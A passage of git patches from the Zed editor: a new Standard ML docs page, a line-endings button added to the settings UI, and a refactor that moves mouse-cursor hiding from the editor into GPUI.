- [Scala](./languages/scala.md) - [Scheme](./languages/scheme.md) - [Shell Script](./languages/sh.md) +- [Standard ML](./languages/sml.md) - [Svelte](./languages/svelte.md) - [Swift](./languages/swift.md) - [Tailwind CSS](./languages/tailwindcss.md) \* diff --git a/docs/src/languages/sml.md b/docs/src/languages/sml.md new file mode 100644 index 00000000000000..2077f05dc982eb --- /dev/null +++ b/docs/src/languages/sml.md @@ -0,0 +1,28 @@ +--- +title: Standard ML +description: "Configure Standard ML language support in Zed, including language servers, formatting, and debugging." +--- + +# Standard ML + +Standard ML support is available through the community-maintained [Standard ML extension](https://github.com/omarjatoi/zed-sml). + +- Tree-sitter: [MatthewFluet/tree-sitter-sml](https://github.com/MatthewFluet/tree-sitter-sml) +- Language Server: [Millet](https://github.com/azdavis/millet) + +## Setup + +1. Install a Standard ML implementation such as [SML/NJ](https://www.smlnj.org/) or [MLton](http://mlton.org/) to compile and run your code. +2. [Install Millet](https://github.com/azdavis/millet#install) and ensure `millet-ls` is on your `$PATH`. + +## Project setup + +For projects with more than one source file, Millet expects a single root group file. Create a `millet.toml` in the directory you open in Zed: + +```toml +version = 1 +[workspace] +root = "sources.mlb" +``` + +The root must be either a [ML Basis (MLB)](http://mlton.org/MLBasis) file (`.mlb`, used with MLton) or a [SML/NJ Compilation Manager (CM)](https://www.smlnj.org/doc/CM/new.pdf) file (`.cm`, used with SML/NJ). Files not transitively reachable from the root are not analyzed. See the [Millet manual](https://github.com/azdavis/millet/blob/main/docs/manual.md) for more options. 
From 7d439b880ab90022954e01db984d39d81cc3aec6 Mon Sep 17 00:00:00 2001 From: George Waters Date: Mon, 4 May 2026 18:24:24 -0400 Subject: [PATCH 175/231] Add show line endings button to Settings UI (#55707) This is following up from #39609 to add the line endings button setting into settings ui. Release Notes: - Added the line endings button setting to settings ui. --- crates/settings_ui/src/page_data.rs | 24 +++++++++++++++++++++++- 1 file changed, 23 insertions(+), 1 deletion(-) diff --git a/crates/settings_ui/src/page_data.rs b/crates/settings_ui/src/page_data.rs index 112aa5f5716563..a43c566d1a7524 100644 --- a/crates/settings_ui/src/page_data.rs +++ b/crates/settings_ui/src/page_data.rs @@ -3487,7 +3487,7 @@ fn search_and_files_page() -> SettingsPage { } fn window_and_layout_page() -> SettingsPage { - fn status_bar_section() -> [SettingsPageItem; 10] { + fn status_bar_section() -> [SettingsPageItem; 11] { [ SettingsPageItem::SectionHeader("Status Bar"), SettingsPageItem::SettingItem(SettingItem { @@ -3574,6 +3574,28 @@ fn window_and_layout_page() -> SettingsPage { metadata: None, files: USER, }), + SettingsPageItem::SettingItem(SettingItem { + title: "Line Endings Button", + description: "Show the active line endings button in the status bar.", + field: Box::new(SettingField { + json_path: Some("status_bar.line_endings_button"), + pick: |settings_content| { + settings_content + .status_bar + .as_ref()? 
+ .line_endings_button + .as_ref() + }, + write: |settings_content, value, _| { + settings_content + .status_bar + .get_or_insert_default() + .line_endings_button = value; + }, + }), + metadata: None, + files: USER, + }), SettingsPageItem::SettingItem(SettingItem { title: "Terminal Button", description: "Show the terminal button in the status bar.", From d411289e279bfc5918c79631185d1a41d209d81d Mon Sep 17 00:00:00 2001 From: Agus Zubiaga Date: Mon, 4 May 2026 19:51:56 -0300 Subject: [PATCH 176/231] Handle hiding cursor on keyboard input at GPUI level (#55664) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Instead of manually handing hiding the cursor on keyboard input at the editor level, GPUI will now take care of it. This makes it significantly easier to handle the edge cases, and allows delegating the cursor restoration to the platform itself in the macOS case. On Linux and Windows, we still have to restore the cursor on movement ourselves, but this now happens at the platform-specific level. Bugs fixed by this change: - No cursor when "Unsaved edits" prompt appears - Cursor disappears when clicking a panel button if it contains a search bar (e.g. collab panel) ### Setting rename The `hide_mouse` setting value `"on_typing_and_movement"` has been renamed to `"on_typing_and_action"` to better reflect what it actually does — it hides the cursor when a keystroke resolves to an action (e.g. cursor movement, deletion). Existing settings are migrated automatically. 
### Tested platforms - [x] macOS - [x] Wayland - [x] X11 - [x] Windows - [x] Web Self-Review Checklist: - [x] I've reviewed my own diff for quality, security, and reliability - [x] Unsafe blocks (if any) have justifying comments - [x] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [ ] Tests cover the new/changed behavior - [x] Performance impact has been considered and is acceptable Release Notes: - Renamed the `hide_mouse` setting value `on_typing_and_movement` to `on_typing_and_action` to better describe its behavior (existing settings are auto-migrated) - Fixed a few situations where the mouse cursor would be incorrectly hidden --- assets/settings/default.json | 9 +- crates/editor/src/editor.rs | 191 +----------------- crates/editor/src/editor_settings.rs | 7 +- crates/editor/src/element.rs | 5 +- crates/editor/src/hover_links.rs | 32 +-- crates/gpui/src/app.rs | 39 ++++ crates/gpui/src/platform.rs | 11 +- crates/gpui/src/platform/test/platform.rs | 6 + crates/gpui/src/platform/visual_test.rs | 8 + crates/gpui/src/window.rs | 59 ++++-- crates/gpui_linux/src/linux/platform.rs | 18 +- crates/gpui_linux/src/linux/wayland.rs | 6 - crates/gpui_linux/src/linux/wayland/client.rs | 134 +++++++++--- crates/gpui_linux/src/linux/x11/client.rs | 149 +++++++++++--- crates/gpui_macos/src/platform.rs | 33 ++- crates/gpui_macos/src/window.rs | 71 ++----- crates/gpui_macros/src/styles.rs | 6 - crates/gpui_web/src/platform.rs | 107 +++++++++- crates/gpui_windows/src/events.rs | 27 ++- crates/gpui_windows/src/platform.rs | 30 +++ crates/gpui_windows/src/util.rs | 1 - crates/gpui_windows/src/window.rs | 8 + crates/migrator/src/migrations.rs | 6 + .../src/migrations/m_2026_05_04/settings.rs | 38 ++++ crates/migrator/src/migrator.rs | 44 ++++ crates/settings/src/vscode_import.rs | 2 +- crates/settings_content/src/editor.rs | 32 --- .../settings_content/src/settings_content.rs | 36 ++++ 
crates/settings_ui/src/page_data.rs | 4 +- crates/vim/src/helix.rs | 5 +- crates/vim/src/vim.rs | 8 +- crates/zed/src/zed.rs | 21 ++ docs/src/reference/all-settings.md | 9 +- docs/src/visual-customization.md | 4 +- 34 files changed, 716 insertions(+), 450 deletions(-) create mode 100644 crates/migrator/src/migrations/m_2026_05_04/settings.rs diff --git a/assets/settings/default.json b/assets/settings/default.json index 54b9070da2be39..cd2e164dfb0de5 100644 --- a/assets/settings/default.json +++ b/assets/settings/default.json @@ -230,15 +230,16 @@ // // Default: "bar" "cursor_shape": "bar", - // Determines when the mouse cursor should be hidden in an editor or input box. + // Determines when the mouse cursor should be hidden in response to keyboard + // input. // // 1. Never hide the mouse cursor: // "never" // 2. Hide only when typing: // "on_typing" - // 3. Hide on both typing and cursor movement: - // "on_typing_and_movement" - "hide_mouse": "on_typing_and_movement", + // 3. Hide on typing and on key bindings that resolve to an action: + // "on_typing_and_action" + "hide_mouse": "on_typing_and_action", // Determines whether the focused panel follows the mouse location. 
"focus_follows_mouse": { "enabled": false, diff --git a/crates/editor/src/editor.rs b/crates/editor/src/editor.rs index a05876d2d9cdbc..ea38200cfe7686 100644 --- a/crates/editor/src/editor.rs +++ b/crates/editor/src/editor.rs @@ -65,8 +65,8 @@ pub use display_map::{ pub use edit_prediction_types::Direction; pub use editor_settings::{ CompletionDetailAlignment, CurrentLineHighlight, DiffViewStyle, DocumentColorsRenderMode, - EditorSettings, EditorSettingsScrollbarProxy, HideMouseMode, ScrollBeyondLastLine, - ScrollbarAxes, SearchSettings, ShowMinimap, ui_scrollbar_settings_from_raw, + EditorSettings, EditorSettingsScrollbarProxy, ScrollBeyondLastLine, ScrollbarAxes, + SearchSettings, ShowMinimap, ui_scrollbar_settings_from_raw, }; pub use element::{ CursorLayout, EditorElement, HighlightedRange, HighlightedRangeLine, PointForPosition, @@ -334,11 +334,6 @@ enum DisplayDiffHunk { }, } -pub enum HideMouseCursorOrigin { - TypingAction, - MovementAction, -} - pub fn init(cx: &mut App) { cx.set_global(GlobalBlameRenderer(Arc::new(()))); cx.set_global(breadcrumbs::RenderBreadcrumbText(render_breadcrumb_text)); @@ -1354,9 +1349,7 @@ pub struct Editor { _scroll_cursor_center_top_bottom_task: Task<()>, serialize_selections: Task<()>, serialize_folds: Task<()>, - mouse_cursor_hidden: bool, minimap: Option>, - hide_mouse_mode: HideMouseMode, pub change_list: ChangeList, inline_value_cache: InlineValueCache, number_deleted_lines: bool, @@ -2624,9 +2617,6 @@ impl Editor { blink_manager.disable(cx); } }); - if active { - editor.show_mouse_cursor(cx); - } }), ] }) @@ -2658,11 +2648,7 @@ impl Editor { text_style_refinement: None, load_diff_task: load_uncommitted_diff, temporary_diff_override: false, - mouse_cursor_hidden: false, minimap: None, - hide_mouse_mode: EditorSettings::get_global(cx) - .hide_mouse - .unwrap_or_default(), change_list: ChangeList::new(), mode, selection_drag_state: SelectionDragState::None, @@ -3004,31 +2990,6 @@ impl Editor { self.last_bounds.as_ref() } - fn 
show_mouse_cursor(&mut self, cx: &mut Context) { - if self.mouse_cursor_hidden { - self.mouse_cursor_hidden = false; - cx.notify(); - } - } - - pub fn hide_mouse_cursor(&mut self, origin: HideMouseCursorOrigin, cx: &mut Context) { - let hide_mouse_cursor = match origin { - HideMouseCursorOrigin::TypingAction => { - matches!( - self.hide_mouse_mode, - HideMouseMode::OnTyping | HideMouseMode::OnTypingAndMovement - ) - } - HideMouseCursorOrigin::MovementAction => { - matches!(self.hide_mouse_mode, HideMouseMode::OnTypingAndMovement) - } - }; - if self.mouse_cursor_hidden != hide_mouse_cursor { - self.mouse_cursor_hidden = hide_mouse_cursor; - cx.notify(); - } - } - fn accept_edit_prediction_keystroke( &self, granularity: EditPredictionGranularity, @@ -4830,8 +4791,6 @@ impl Editor { return; } - self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); - self.unfold_buffers_with_selections(cx); let selections = self.selections.all_adjusted(&self.display_snapshot(cx)); @@ -5333,7 +5292,6 @@ impl Editor { return; } - self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); self.transact(window, cx, |this, window, cx| { let (edits_with_flags, selection_info): (Vec<_>, Vec<_>) = { let selections = this @@ -5572,8 +5530,6 @@ impl Editor { return; } - self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); - let buffer = self.buffer.read(cx); let snapshot = buffer.snapshot(cx); @@ -5643,8 +5599,6 @@ impl Editor { return; } - self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); - let mut buffer_edits: HashMap, Vec)> = HashMap::default(); let mut rows = Vec::new(); let mut rows_inserted = 0; @@ -6699,7 +6653,6 @@ impl Editor { if self.read_only(cx) { return None; } - self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); self.do_completion(action.item_ix, CompletionIntent::Complete, window, cx) } @@ -6712,7 +6665,6 @@ impl Editor { if self.read_only(cx) { return None; } - self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, 
cx); self.do_completion(None, CompletionIntent::CompleteWithInsert, window, cx) } @@ -6725,7 +6677,6 @@ impl Editor { if self.read_only(cx) { return None; } - self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); self.do_completion(None, CompletionIntent::CompleteWithReplace, window, cx) } @@ -6735,7 +6686,6 @@ impl Editor { window: &mut Window, cx: &mut Context, ) -> Option>> { - self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); self.do_completion(action.item_ix, CompletionIntent::Compose, window, cx) } @@ -7229,7 +7179,6 @@ impl Editor { if self.read_only(cx) { return None; } - self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); let actions_menu = if let CodeContextMenu::CodeActions(menu) = self.hide_context_menu(window, cx)? { @@ -11293,7 +11242,6 @@ impl Editor { if self.read_only(cx) { return; } - self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); self.transact(window, cx, |this, window, cx| { this.select_autoclose_pair(window, cx); @@ -11346,7 +11294,6 @@ impl Editor { if self.read_only(cx) { return; } - self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); self.transact(window, cx, |this, window, cx| { this.change_selections(Default::default(), window, cx, |s| { s.move_with(&mut |map, selection| { @@ -11372,7 +11319,6 @@ impl Editor { return; } - self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); if self.move_to_prev_snippet_tabstop(window, cx) { return; } @@ -11391,7 +11337,6 @@ impl Editor { } if self.move_to_next_snippet_tabstop(window, cx) { - self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); return; } cx.propagate(); @@ -11409,7 +11354,6 @@ impl Editor { } if self.move_to_prev_snippet_tabstop(window, cx) { - self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); return; } cx.propagate(); @@ -11422,13 +11366,11 @@ impl Editor { } if self.move_to_next_snippet_tabstop(window, cx) { - self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); return; 
} if self.read_only(cx) { return; } - self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); let mut selections = self.selections.all_adjusted(&self.display_snapshot(cx)); let buffer = self.buffer.read(cx); let snapshot = buffer.snapshot(cx); @@ -11560,7 +11502,6 @@ impl Editor { return; } - self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); let mut selections = self.selections.all::(&self.display_snapshot(cx)); let mut prev_edited_row = 0; let mut row_delta = 0; @@ -11668,7 +11609,6 @@ impl Editor { return; } - self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); let display_map = self.display_map.update(cx, |map, cx| map.snapshot(cx)); let selections = self.selections.all::(&display_map); let mut deletion_ranges = Vec::new(); @@ -11747,7 +11687,6 @@ impl Editor { return; } - self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); let selections = self .selections .all::(&self.display_snapshot(cx)) @@ -11769,7 +11708,6 @@ impl Editor { if self.read_only(cx) { return; } - self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); let display_map = self.display_map.update(cx, |map, cx| map.snapshot(cx)); let selections = self.selections.all::(&display_map); @@ -11983,7 +11921,6 @@ impl Editor { } pub fn join_lines(&mut self, _: &JoinLines, window: &mut Window, cx: &mut Context) { - self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); self.join_lines_impl(true, window, cx); } @@ -12065,7 +12002,6 @@ impl Editor { if self.read_only(cx) { return; } - self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); let snapshot = self.buffer.read(cx).snapshot(cx); @@ -12168,7 +12104,6 @@ impl Editor { if self.read_only(cx) { return; } - self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); let mut buffer_ids = HashSet::default(); let snapshot = self.buffer().read(cx).snapshot(cx); for selection in self @@ -12190,7 +12125,6 @@ impl Editor { if self.read_only(cx) { return; } - 
self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); let selections = self .selections .all(&self.display_snapshot(cx)) @@ -12219,7 +12153,6 @@ impl Editor { .map(|selection| selection.range()) .collect(); - self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); self.restore_hunks_in_ranges(selections, window, cx); let all_diff_hunks_expanded = self.buffer().read(cx).all_diff_hunks_expanded(); @@ -12622,7 +12555,6 @@ impl Editor { if self.read_only(cx) { return; } - self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); let display_snapshot = self.display_snapshot(cx); @@ -12863,7 +12795,6 @@ impl Editor { if self.read_only(cx) { return; } - self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); let display_snapshot = self.display_snapshot(cx); let selections = self.selections.all::(&display_snapshot); @@ -13017,7 +12948,6 @@ impl Editor { if self.read_only(cx) { return; } - self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); let display_map = self.display_map.update(cx, |map, cx| map.snapshot(cx)); let buffer = self.buffer.read(cx).snapshot(cx); @@ -13439,7 +13369,6 @@ impl Editor { if self.read_only(cx) { return; } - self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); let buffer = self.buffer.read(cx).snapshot(cx); let mut new_selections = Vec::new(); @@ -13539,7 +13468,6 @@ impl Editor { if self.read_only(cx) { return; } - self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); let display_map = self.display_map.update(cx, |map, cx| map.snapshot(cx)); let buffer = display_map.buffer_snapshot(); @@ -13687,7 +13615,6 @@ impl Editor { if self.read_only(cx) { return; } - self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); if self.mode.is_single_line() { cx.propagate(); return; @@ -13801,7 +13728,6 @@ impl Editor { if self.read_only(cx) { return; } - self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); if self.mode.is_single_line() { cx.propagate(); return; @@ 
-13898,7 +13824,6 @@ impl Editor { if self.read_only(cx) { return; } - self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); let text_layout_details = &self.text_layout_details(window, cx); self.transact(window, cx, |this, window, cx| { let edits = this.change_selections(Default::default(), window, cx, |s| { @@ -13963,7 +13888,6 @@ impl Editor { if self.read_only(cx) { return; } - self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); if self.mode.is_single_line() { cx.propagate(); return; @@ -14426,7 +14350,6 @@ impl Editor { if self.read_only(cx) { return; } - self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); let item = self.cut_common(true, window, cx); cx.write_to_clipboard(item); } @@ -14435,7 +14358,6 @@ impl Editor { if self.read_only(cx) { return; } - self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); self.change_selections(SelectionEffects::no_scroll(), window, cx, |s| { s.move_with(&mut |snapshot, sel| { if sel.is_empty() { @@ -14456,7 +14378,6 @@ impl Editor { window: &mut Window, cx: &mut Context, ) { - self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); let (text, metadata) = if let Some(KillRing(item)) = cx.try_global() { if let Some(ClipboardEntry::String(kill_ring)) = item.entries().first() { (kill_ring.text().to_string(), kill_ring.metadata_json()) @@ -14804,7 +14725,6 @@ impl Editor { if self.read_only(cx) { return; } - self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); if let Some(item) = cx.read_from_clipboard() { let clipboard_string = item.entries().iter().find_map(|entry| match entry { ClipboardEntry::String(s) => Some(s), @@ -14828,8 +14748,6 @@ impl Editor { return; } - self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); - if let Some(transaction_id) = self.buffer.update(cx, |buffer, cx| buffer.undo(cx)) { if let Some((selections, _)) = self.selection_history.transaction(transaction_id).cloned() @@ -14858,8 +14776,6 @@ impl Editor { return; } - 
self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); - if let Some(transaction_id) = self.buffer.update(cx, |buffer, cx| buffer.redo(cx)) { if let Some((_, Some(selections))) = self.selection_history.transaction(transaction_id).cloned() @@ -14893,7 +14809,6 @@ impl Editor { } pub fn move_left(&mut self, _: &MoveLeft, window: &mut Window, cx: &mut Context) { - self.hide_mouse_cursor(HideMouseCursorOrigin::MovementAction, cx); self.change_selections(Default::default(), window, cx, |s| { s.move_with(&mut |map, selection| { let cursor = if selection.is_empty() { @@ -14907,14 +14822,12 @@ impl Editor { } pub fn select_left(&mut self, _: &SelectLeft, window: &mut Window, cx: &mut Context) { - self.hide_mouse_cursor(HideMouseCursorOrigin::MovementAction, cx); self.change_selections(Default::default(), window, cx, |s| { s.move_heads_with(&mut |map, head, _| (movement::left(map, head), SelectionGoal::None)); }) } pub fn move_right(&mut self, _: &MoveRight, window: &mut Window, cx: &mut Context) { - self.hide_mouse_cursor(HideMouseCursorOrigin::MovementAction, cx); self.change_selections(Default::default(), window, cx, |s| { s.move_with(&mut |map, selection| { let cursor = if selection.is_empty() { @@ -14928,7 +14841,6 @@ impl Editor { } pub fn select_right(&mut self, _: &SelectRight, window: &mut Window, cx: &mut Context) { - self.hide_mouse_cursor(HideMouseCursorOrigin::MovementAction, cx); self.change_selections(Default::default(), window, cx, |s| { s.move_heads_with(&mut |map, head, _| { (movement::right(map, head), SelectionGoal::None) @@ -14946,8 +14858,6 @@ impl Editor { return; } - self.hide_mouse_cursor(HideMouseCursorOrigin::MovementAction, cx); - let text_layout_details = &self.text_layout_details(window, cx); let selection_count = self.selections.count(); let first_selection = self.selections.first_anchor(); @@ -14989,8 +14899,6 @@ impl Editor { return; } - self.hide_mouse_cursor(HideMouseCursorOrigin::MovementAction, cx); - let text_layout_details = 
&self.text_layout_details(window, cx); self.change_selections(Default::default(), window, cx, |s| { @@ -15026,8 +14934,6 @@ impl Editor { return; } - self.hide_mouse_cursor(HideMouseCursorOrigin::MovementAction, cx); - let text_layout_details = &self.text_layout_details(window, cx); self.change_selections(Default::default(), window, cx, |s| { @@ -15054,7 +14960,6 @@ impl Editor { window: &mut Window, cx: &mut Context, ) { - self.hide_mouse_cursor(HideMouseCursorOrigin::MovementAction, cx); let text_layout_details = &self.text_layout_details(window, cx); self.change_selections(Default::default(), window, cx, |s| { s.move_heads_with(&mut |map, head, goal| { @@ -15069,7 +14974,6 @@ impl Editor { window: &mut Window, cx: &mut Context, ) { - self.hide_mouse_cursor(HideMouseCursorOrigin::MovementAction, cx); let text_layout_details = &self.text_layout_details(window, cx); self.change_selections(Default::default(), window, cx, |s| { s.move_heads_with(&mut |map, head, goal| { @@ -15088,8 +14992,6 @@ impl Editor { return; }; - self.hide_mouse_cursor(HideMouseCursorOrigin::MovementAction, cx); - let text_layout_details = &self.text_layout_details(window, cx); self.change_selections(Default::default(), window, cx, |s| { @@ -15128,8 +15030,6 @@ impl Editor { return; }; - self.hide_mouse_cursor(HideMouseCursorOrigin::MovementAction, cx); - let effects = if action.center_cursor { SelectionEffects::scroll(Autoscroll::center()) } else { @@ -15157,7 +15057,6 @@ impl Editor { } pub fn select_up(&mut self, _: &SelectUp, window: &mut Window, cx: &mut Context) { - self.hide_mouse_cursor(HideMouseCursorOrigin::MovementAction, cx); let text_layout_details = &self.text_layout_details(window, cx); self.change_selections(Default::default(), window, cx, |s| { s.move_heads_with(&mut |map, head, goal| { @@ -15174,8 +15073,6 @@ impl Editor { return; } - self.hide_mouse_cursor(HideMouseCursorOrigin::MovementAction, cx); - let text_layout_details = &self.text_layout_details(window, cx); let 
selection_count = self.selections.count(); let first_selection = self.selections.first_anchor(); @@ -15212,8 +15109,6 @@ impl Editor { return; }; - self.hide_mouse_cursor(HideMouseCursorOrigin::MovementAction, cx); - let text_layout_details = &self.text_layout_details(window, cx); self.change_selections(Default::default(), window, cx, |s| { @@ -15252,8 +15147,6 @@ impl Editor { return; }; - self.hide_mouse_cursor(HideMouseCursorOrigin::MovementAction, cx); - let effects = if action.center_cursor { SelectionEffects::scroll(Autoscroll::center()) } else { @@ -15280,7 +15173,6 @@ impl Editor { } pub fn select_down(&mut self, _: &SelectDown, window: &mut Window, cx: &mut Context) { - self.hide_mouse_cursor(HideMouseCursorOrigin::MovementAction, cx); let text_layout_details = &self.text_layout_details(window, cx); self.change_selections(Default::default(), window, cx, |s| { s.move_heads_with(&mut |map, head, goal| { @@ -15371,7 +15263,6 @@ impl Editor { window: &mut Window, cx: &mut Context, ) { - self.hide_mouse_cursor(HideMouseCursorOrigin::MovementAction, cx); self.change_selections(Default::default(), window, cx, |s| { s.move_cursors_with(&mut |map, head, _| { ( @@ -15388,7 +15279,6 @@ impl Editor { window: &mut Window, cx: &mut Context, ) { - self.hide_mouse_cursor(HideMouseCursorOrigin::MovementAction, cx); self.change_selections(Default::default(), window, cx, |s| { s.move_cursors_with(&mut |map, head, _| { ( @@ -15405,7 +15295,6 @@ impl Editor { window: &mut Window, cx: &mut Context, ) { - self.hide_mouse_cursor(HideMouseCursorOrigin::MovementAction, cx); self.change_selections(Default::default(), window, cx, |s| { s.move_heads_with(&mut |map, head, _| { ( @@ -15422,7 +15311,6 @@ impl Editor { window: &mut Window, cx: &mut Context, ) { - self.hide_mouse_cursor(HideMouseCursorOrigin::MovementAction, cx); self.change_selections(Default::default(), window, cx, |s| { s.move_heads_with(&mut |map, head, _| { ( @@ -15442,7 +15330,6 @@ impl Editor { if self.read_only(cx) 
{ return; } - self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); self.transact(window, cx, |this, window, cx| { this.select_autoclose_pair(window, cx); this.change_selections(Default::default(), window, cx, |s| { @@ -15476,7 +15363,6 @@ impl Editor { if self.read_only(cx) { return; } - self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); self.transact(window, cx, |this, window, cx| { this.select_autoclose_pair(window, cx); this.change_selections(Default::default(), window, cx, |s| { @@ -15507,7 +15393,6 @@ impl Editor { window: &mut Window, cx: &mut Context, ) { - self.hide_mouse_cursor(HideMouseCursorOrigin::MovementAction, cx); self.change_selections(Default::default(), window, cx, |s| { s.move_cursors_with(&mut |map, head, _| { (movement::next_word_end(map, head), SelectionGoal::None) @@ -15521,7 +15406,6 @@ impl Editor { window: &mut Window, cx: &mut Context, ) { - self.hide_mouse_cursor(HideMouseCursorOrigin::MovementAction, cx); self.change_selections(Default::default(), window, cx, |s| { s.move_cursors_with(&mut |map, head, _| { (movement::next_subword_end(map, head), SelectionGoal::None) @@ -15535,7 +15419,6 @@ impl Editor { window: &mut Window, cx: &mut Context, ) { - self.hide_mouse_cursor(HideMouseCursorOrigin::MovementAction, cx); self.change_selections(Default::default(), window, cx, |s| { s.move_heads_with(&mut |map, head, _| { (movement::next_word_end(map, head), SelectionGoal::None) @@ -15549,7 +15432,6 @@ impl Editor { window: &mut Window, cx: &mut Context, ) { - self.hide_mouse_cursor(HideMouseCursorOrigin::MovementAction, cx); self.change_selections(Default::default(), window, cx, |s| { s.move_heads_with(&mut |map, head, _| { (movement::next_subword_end(map, head), SelectionGoal::None) @@ -15566,7 +15448,6 @@ impl Editor { if self.read_only(cx) { return; } - self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); self.transact(window, cx, |this, window, cx| { this.change_selections(Default::default(), window, 
cx, |s| { s.move_with(&mut |map, selection| { @@ -15599,7 +15480,6 @@ impl Editor { if self.read_only(cx) { return; } - self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); self.transact(window, cx, |this, window, cx| { this.change_selections(Default::default(), window, cx, |s| { s.move_with(&mut |map, selection| { @@ -15630,7 +15510,6 @@ impl Editor { cx: &mut Context, ) { let stop_at_indent = action.stop_at_indent && !self.mode.is_single_line(); - self.hide_mouse_cursor(HideMouseCursorOrigin::MovementAction, cx); self.change_selections(Default::default(), window, cx, |s| { s.move_cursors_with(&mut |map, head, _| { ( @@ -15653,7 +15532,6 @@ impl Editor { cx: &mut Context, ) { let stop_at_indent = action.stop_at_indent && !self.mode.is_single_line(); - self.hide_mouse_cursor(HideMouseCursorOrigin::MovementAction, cx); self.change_selections(Default::default(), window, cx, |s| { s.move_heads_with(&mut |map, head, _| { ( @@ -15678,7 +15556,6 @@ impl Editor { if self.read_only(cx) { return; } - self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); self.transact(window, cx, |this, window, cx| { this.change_selections(Default::default(), window, cx, |s| { s.move_with(&mut |_, selection| { @@ -15704,7 +15581,6 @@ impl Editor { window: &mut Window, cx: &mut Context, ) { - self.hide_mouse_cursor(HideMouseCursorOrigin::MovementAction, cx); self.change_selections(Default::default(), window, cx, |s| { s.move_cursors_with(&mut |map, head, _| { ( @@ -15721,7 +15597,6 @@ impl Editor { window: &mut Window, cx: &mut Context, ) { - self.hide_mouse_cursor(HideMouseCursorOrigin::MovementAction, cx); self.change_selections(Default::default(), window, cx, |s| { s.move_heads_with(&mut |map, head, _| { ( @@ -15741,7 +15616,6 @@ impl Editor { if self.read_only(cx) { return; } - self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); self.transact(window, cx, |this, window, cx| { this.select_to_end_of_line( &SelectToEndOfLine { @@ -15763,7 +15637,6 @@ impl 
Editor { if self.read_only(cx) { return; } - self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); self.transact(window, cx, |this, window, cx| { this.select_to_end_of_line( &SelectToEndOfLine { @@ -15781,7 +15654,6 @@ impl Editor { }); }); } - this.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); let item = this.cut_common(false, window, cx); cx.write_to_clipboard(item); }); @@ -15797,7 +15669,6 @@ impl Editor { cx.propagate(); return; } - self.hide_mouse_cursor(HideMouseCursorOrigin::MovementAction, cx); self.change_selections(Default::default(), window, cx, |s| { s.move_with(&mut |map, selection| { selection.collapse_to( @@ -15818,7 +15689,6 @@ impl Editor { cx.propagate(); return; } - self.hide_mouse_cursor(HideMouseCursorOrigin::MovementAction, cx); self.change_selections(Default::default(), window, cx, |s| { s.move_with(&mut |map, selection| { selection.collapse_to( @@ -15839,7 +15709,6 @@ impl Editor { cx.propagate(); return; } - self.hide_mouse_cursor(HideMouseCursorOrigin::MovementAction, cx); self.change_selections(Default::default(), window, cx, |s| { s.move_heads_with(&mut |map, head, _| { ( @@ -15860,7 +15729,6 @@ impl Editor { cx.propagate(); return; } - self.hide_mouse_cursor(HideMouseCursorOrigin::MovementAction, cx); self.change_selections(Default::default(), window, cx, |s| { s.move_heads_with(&mut |map, head, _| { ( @@ -15881,7 +15749,6 @@ impl Editor { cx.propagate(); return; } - self.hide_mouse_cursor(HideMouseCursorOrigin::MovementAction, cx); self.change_selections(Default::default(), window, cx, |s| { s.move_with(&mut |map, selection| { selection.collapse_to( @@ -15931,7 +15798,6 @@ impl Editor { cx.propagate(); return; } - self.hide_mouse_cursor(HideMouseCursorOrigin::MovementAction, cx); self.change_selections(Default::default(), window, cx, |s| { s.move_with(&mut |map, selection| { selection.collapse_to( @@ -15956,7 +15822,6 @@ impl Editor { cx.propagate(); return; } - 
